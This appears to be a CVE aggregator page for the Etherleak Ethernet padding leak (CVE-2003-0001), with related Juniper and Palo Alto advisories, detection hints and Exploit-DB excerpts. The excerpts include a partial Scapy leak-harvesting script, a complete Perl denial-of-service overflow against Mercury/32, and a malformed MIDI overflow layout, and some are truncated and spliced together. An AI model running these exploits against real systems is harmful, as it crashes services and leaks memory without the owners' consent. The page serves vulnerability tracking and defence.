CVE-2003-0001
published 2003-01-17CVE-2003-0001: Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from…
PriorityP341medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
73.01%
99.4th percentile
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
Affected
99 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| juniper | junos | < 18.4 | 18.4 |
| juniper | junos | < 18.3 | 18.3 |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect Etherleak (CVE-2003-0001) by capturing Ethernet frames where the captured packet length exceeds the sum of the Layer 2 header size plus the Layer 3/4 payload length — the trailing bytes beyond the payload constitute leaked kernel memory padding. ↗
- →Filter for Ethernet frames carrying a Scapy 'Padding' layer on ARP or ICMP traffic to identify hosts leaking kernel memory in frame padding. ↗
- →For ARP-based Etherleak detection, extract leaked bytes at offset 10–14 of the padding layer; for ICMP-based detection, extract bytes at offset 9–13 of the padding layer. ↗
- →Trigger Etherleak disclosure by sending ARP or ICMP packets to the target and sniffing responses for non-zero padding beyond the protocol payload boundary. ↗
- →Datalink type 1 (Ethernet) frames have a 14-byte L2 header; datalink type 113 (Linux cooked capture) frames have a 16-byte header. Any captured bytes beyond header+payload length indicate leaked memory padding. ↗
- ·Cisco IOS 12.1 and 12.2 trains are explicitly stated as NOT affected by this vulnerability. ↗
- ·National Semiconductor Ethernet controller chips are not vulnerable to this issue. ↗
- ·Juniper ScreenOS devices (all versions prior to 6.3.0r25) do not pad Ethernet packets with zeros and are affected; this issue is often detected as CVE-2003-0001. ↗
- ·Juniper Junos OS on PTX1000/PTX10000 and QFX10000/PTX5000 Series devices sometimes do not reliably pad Ethernet packets; this issue is also known as 'Etherleak' and often detected as CVE-2003-0001. ↗
- ·Juniper SRX1400, SRX3400, and SRX3600 running affected Junos versions do not properly initialize memory locations used during padding of Ethernet packets, leaking sensitive information — a related issue to CVE-2003-0001. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Juniper
CVE-2022-22216: An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series al
vendor_juniper·2022-07-20·CVSS 4.3
CVE-2022-22216 [MEDIUM] CWE-200 CVE-2022-22216: An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series al
CVE-2022-22216: An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series allows an adjacent unauthenticated attacker to gain access to sensitive information. PTX1000 and PTX10000 Series, and QFX10000 Series and PTX5000 Series devices sometimes do not reliably pad Ethernet packets, and thus some packets can contain fragments of system memory or data from previous packets. This issue is also known as 'Etherleak' and often detected as CVE-2003-0001. This issue affects: Juniper Networks Junos OS on PTX1000 and PTX10000 Series: All versions prior to 18.4R3-S11; 19.1 versions prior to 19.1R2-S3, 19.1R3-S7; 19.2 versions prior to 19.2R1-S8, 19.2R3-S4; 19.3 versions prior to 19.3R3-S4; 19.4 versions prior to
Palo Alto
PAN-OS: Information exposure in Ethernet data frame construction (Etherleak)
vendor_paloalto·2021-01-13·CVSS 5.0
CVE-2021-3031 [MEDIUM] CWE-200 PAN-OS: Information exposure in Ethernet data frame construction (Etherleak)
PAN-OS: Information exposure in Ethernet data frame construction (Etherleak)
Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-5000 Series, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series firewalls are not cleared before the data frame is created. This leaks a small amount of random information from the firewall memory into the Ethernet packets. An attacker on the same Ethernet subnet as the PAN-OS firewall is able to collect potentially sensitive information from these packets.
This issue is also known as Etherleak and is detected by security scanners as CVE-2003-0001.
Affected products: PAN-OS
Solution: This issue is fixed in PAN-OS 8.1.18, PAN-OS 9.0.12, PAN-OS 9.1.5, and all later PAN-OS versions.
Workaround: There is no wor
Juniper
CVE-2018-0014: Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from pr
vendor_juniper·2018-01-10·CVSS 4.3
CVE-2018-0014 [MEDIUM] CWE-200 CVE-2018-0014: Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from pr
CVE-2018-0014: Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from previous packets. This issue is often detected as CVE-2003-0001. The issue affects all versions of Juniper Networks ScreenOS prior to 6.3.0r25.
Juniper
CVE-2013-4690: Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before 12.1R5-S3, 12.1X44 before 12.1X44-D20, and 12.1X45 before 12.1X45-D10 on the SRX
vendor_juniper·2013-07-11·CVSS 5.0
CVE-2013-4690 [MEDIUM] CWE-399 CVE-2013-4690: Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before 12.1R5-S3, 12.1X44 before 12.1X44-D20, and 12.1X45 before 12.1X45-D10 on the SRX
CVE-2013-4690: Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before 12.1R5-S3, 12.1X44 before 12.1X44-D20, and 12.1X45 before 12.1X45-D10 on the SRX1400, SRX3400, and SRX3600 does not properly initialize memory locations used during padding of Ethernet packets, which allows remote attackers to obtain sensitive information by reading packet data, aka PR 829536, a related issue to CVE-2003-0001.
Red Hat
cisco: information leak in ethernet frames.
vendor_redhat·2003-01-06·CVSS 5.0
CVE-2003-0001 [MEDIUM] CWE-200 cisco: information leak in ethernet frames.
cisco: information leak in ethernet frames.
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Package: kernel (Red Hat Enterprise Linux 7) - Not affected
Package: kernel-rt (Red Hat Enterprise Linux 7) - Not affected
Package: kernel (Red Hat Enterprise Linux 8) - Not affected
Package: kernel-rt (Red Hat Enterprise Linux 8) - Not affected
GHSA
GHSA-8r8m-8qj7-8fm2: An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series al
ghsa_unreviewed·2022-07-21·CVSS 5.0
CVE-2022-22216 [MEDIUM] CWE-200 GHSA-8r8m-8qj7-8fm2: An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series al
An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series allows an adjacent unauthenticated attacker to gain access to sensitive information. PTX1000 and PTX10000 Series, and QFX10000 Series and PTX5000 Series devices sometimes do not reliably pad Ethernet packets, and thus some packets can contain fragments of system memory or data from previous packets. This issue is also known as 'Etherleak' and often detected as CVE-2003-0001. This issue affects: Juniper Networks Junos OS on PTX1000 and PTX10000 Series: All versions prior to 18.4R3-S11; 19.1 versions prior to 19.1R2-S3, 19.1R3-S7; 19.2 versions prior to 19.2R1-S8, 19.2R3-S4; 19.3 versions prior to 19.3R3-S4; 19.4 versions prior to 19.4R2-S5, 19.4
GHSA
GHSA-v97c-wm3x-xr3x: Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Serie
ghsa_unreviewed·2022-05-24·CVSS 5.0
CVE-2021-3031 [MEDIUM] CWE-200 GHSA-v97c-wm3x-xr3x: Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Serie
Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series firewalls are not cleared before the data frame is created. This leaks a small amount of random information from the firewall memory into the Ethernet packets. An attacker on the same Ethernet subnet as the PAN-OS firewall is able to collect potentially sensitive information from these packets. This issue is also known as Etherleak and is detected by security scanners as CVE-2003-0001. This issue impacts: PAN-OS 8.1 version earlier than PAN-OS 8.1.18; PAN-OS 9.0 versions earlier than PAN-OS 9.0.12; PAN-OS 9.1 versions earlier than PAN-OS 9.1.5.
GHSA
GHSA-hx48-9j3f-rqqx: Juniper Junos 10
ghsa_unreviewed·2022-05-17·CVSS 5.0
CVE-2013-4690 [MEDIUM] GHSA-hx48-9j3f-rqqx: Juniper Junos 10
Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before 12.1R5-S3, 12.1X44 before 12.1X44-D20, and 12.1X45 before 12.1X45-D10 on the SRX1400, SRX3400, and SRX3600 does not properly initialize memory locations used during padding of Ethernet packets, which allows remote attackers to obtain sensitive information by reading packet data, aka PR 829536, a related issue to CVE-2003-0001.
GHSA
GHSA-xgmx-gwqj-mmc5: Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from pr
ghsa_unreviewed·2022-05-13·CVSS 5.0
CVE-2018-0014 [MEDIUM] CWE-200 GHSA-xgmx-gwqj-mmc5: Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from pr
Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from previous packets. This issue is often detected as CVE-2003-0001. The issue affects all versions of Juniper Networks ScreenOS prior to 6.3.0r25.
GHSA
GHSA-945x-53jf-h5qf: Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information f
ghsa_unreviewed·2022-04-29
CVE-2003-0001 [MEDIUM] CWE-200 GHSA-945x-53jf-h5qf: Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information f
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
No detection rules found.
Exploit-DB
Cisco ASA < 8.4.4.6 < 8.2.5.32 - Ethernet Information Leak
exploitdb·2013-06-10·CVSS 5.0
CVE-2003-0001 [MEDIUM] Cisco ASA < 8.4.4.6 < 8.2.5.32 - Ethernet Information Leak
Cisco ASA .1t....~.k.|
# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|
# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\gl"...+.9|
# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S "
sys.exit(1)
type = sys.argv[2]
if type == 'arp':
pass
elif type == 'icmp':
pass
else:
print "Bad type!"
sys.exit(0)
pid = os.fork()
if(pid):
print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
spawn(sys.argv[1],sys.argv[2])
while True:
if type == 'arp':
myfilter = "host %s and arp" % sys.argv[1]
elif type == 'icmp':
myfilter = "host %s and icmp" % sys.argv[1]
x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
p = x[0]
if type == 'arp':
pad = p.getlayer(2)
if type == 'icmp':
pad =
Exploit-DB
Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
exploitdb·2007-03-23·CVSS 5.0
CVE-2003-0001 [MEDIUM] Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
---
source: https://www.securityfocus.com/bid/6535/info
Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.
Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.
Cisco has stated that the IOS 12.1 and 12.2 train
Exploit-DB
Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage
exploitdb·2007-03-23·CVSS 5.0
CVE-2003-0001 [MEDIUM] Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage
Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage
---
#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would be come known as the 'etherleak' bug. In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary. This task is left up to the driver
# for the ethernet device. The RFCs state that this padding must consist
# of NULLs. The bug is that at the time and still to this day, many device
# drivers do not pad will NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of t
Exploit-DB
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb·2004-12-01
CVE-2004-2513 Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
---
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
sleep(1);
print $socket "0001 CHECK " . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
Exploit-DB
NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow (PoC)
exploitdb·2003-09-08
CVE-2003-0765 NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow (PoC)
NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow (PoC)
---
source: https://www.securityfocus.com/bid/8567/info
Winamp MIDI plugin, IN_MIDI.DLL has been reported prone to a buffer overflow issue when handling malicious MIDI files. The issue presents itself when a malicious value is passed as the Track Data Size of a malicious MIDI file header. Although unconfirmed it has been conjectured that an attacker may exploit this condition to execute arbitrary code in the context of the user who is running the affected Winamp player.
4 bytes MIDI Header "MThd"
4 bytes Header data size 00000006
2 bytes Format 0000
2 bytes Number of tracks 0001
2 bytes Divisions 0001
4 bytes Track Header "MTrk"
4 bytes Track data size ffffffff <--- bug
... "aaaaaaaaaaaa
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.htmlhttp://marc.info/?l=bugtraq&m=104222046632243&w=2http://secunia.com/advisories/7996http://www.atstake.com/research/advisories/2003/a010603-1.txthttp://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdfhttp://www.kb.cert.org/vuls/id/412115http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.htmlhttp://www.osvdb.org/9962http://www.redhat.com/support/errata/RHSA-2003-025.htmlhttp://www.redhat.com/support/errata/RHSA-2003-088.htmlhttp://www.securityfocus.com/archive/1/305335/30/26420/threadedhttp://www.securityfocus.com/archive/1/307564/30/26270/threadedhttp://www.securitytracker.com/id/1031583http://www.securitytracker.com/id/1040185https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2665http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.htmlhttp://marc.info/?l=bugtraq&m=104222046632243&w=2http://secunia.com/advisories/7996http://www.atstake.com/research/advisories/2003/a010603-1.txthttp://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdfhttp://www.kb.cert.org/vuls/id/412115http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.htmlhttp://www.osvdb.org/9962http://www.redhat.com/support/errata/RHSA-2003-025.htmlhttp://www.redhat.com/support/errata/RHSA-2003-088.htmlhttp://www.securityfocus.com/archive/1/305335/30/26420/threadedhttp://www.securityfocus.com/archive/1/307564/30/26270/threadedhttp://www.securitytracker.com/id/1031583http://www.securitytracker.com/id/1040185https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2665
2003-01-17
Published